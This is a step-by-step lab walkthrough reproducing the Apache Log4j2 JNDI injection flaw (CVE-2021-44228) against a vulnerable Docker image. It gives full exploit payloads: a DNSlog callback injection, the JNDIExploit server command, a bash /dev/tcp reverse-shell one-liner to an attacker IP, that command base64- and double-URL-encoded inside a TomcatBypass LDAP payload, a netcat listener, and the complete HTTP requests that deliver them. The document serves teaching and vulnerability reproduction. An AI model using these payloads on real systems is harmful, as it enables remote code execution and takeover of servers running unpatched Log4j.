Vulnerability overview
Apache Log4j2 is a Java logging framework that is widely used in business application development. On 24 November 2021 the Alibaba Cloud security team reported a remote code execution vulnerability in Apache Log4j2 (CVE-2021-44228) to Apache.
The vulnerability is triggered by the Lookup feature. Log4j2 enables Lookups by default to substitute special values into log messages, and this feature also supports JNDI lookups. Because the lookup places no restrictions on the JNDI content it loads, an attacker can use JNDI injection to load a malicious class into the application remotely, resulting in RCE (remote code execution).
Affected versions
Apache Log4j 2.x < 2.15.0-rc2
Environment setup
docker pull vulfocus/log4j2-rce-2021-12-09 # pull the vulnerable image
![screenshot](https://img.uj5u.com/2021/12/20/289943200915524.png)
docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 # start the environment
![screenshot](https://img.uj5u.com/2021/12/20/289943200915521.png)
Vulnerability reproduction
DNSlog callback
Visit: http://192.168.99.100:38080/hello
![screenshot](https://img.uj5u.com/2021/12/20/289943200915525.png)
Capture the request with BurpSuite:
![screenshot](https://img.uj5u.com/2021/12/20/289943200915526.png)
Right-click and change the request method:
![screenshot](https://img.uj5u.com/2021/12/20/289943200915527.png)
The request becomes:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Payload: ${jndi:ldap://xxx.dnslog.cn/exp}
Used in this run: ${jndi:ldap://29l3ni.dnslog.cn/exp}
Add it to the request:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
payload=${jndi:ldap://29l3ni.dnslog.cn/exp}
Click Send and check the DNSlog callback:
![screenshot](https://img.uj5u.com/2021/12/20/289943200915528.png)
The callback arrived, which confirms the vulnerability is present.
Reverse shell
Tool used: https://github.com/zzwlpx/JNDIExploit.git
Download on Kali:
git clone https://github.com/zzwlpx/JNDIExploit.git
Run the command to start the service:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.99.121 # attacker machine IP
Reverse shell command:
bash -i >& /dev/tcp/192.169.99.121/4444 0>&1
Initial request:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Payload format: ${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/[transformed reverse-shell command]}
Transformation 1: base64 encoding:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA+JjE=
Transformation 2: URL encoding (note: select "URL-encode key characters" in Burp here):
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%2bJjE%3d
![screenshot](https://img.uj5u.com/2021/12/20/289943200915529.png)
Transformation 3: URL-encode once more (note: again select "URL-encode key characters"):
YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d
After adding the payload, the request becomes:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
payload=${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d}
Start a listener
nc -lvvp 4444
![screenshot](https://img.uj5u.com/2021/12/20/289943200915522.png)
Click Send
![screenshot](https://img.uj5u.com/2021/12/20/289943200915523.png)
Reverse shell obtained!
For learning purposes only!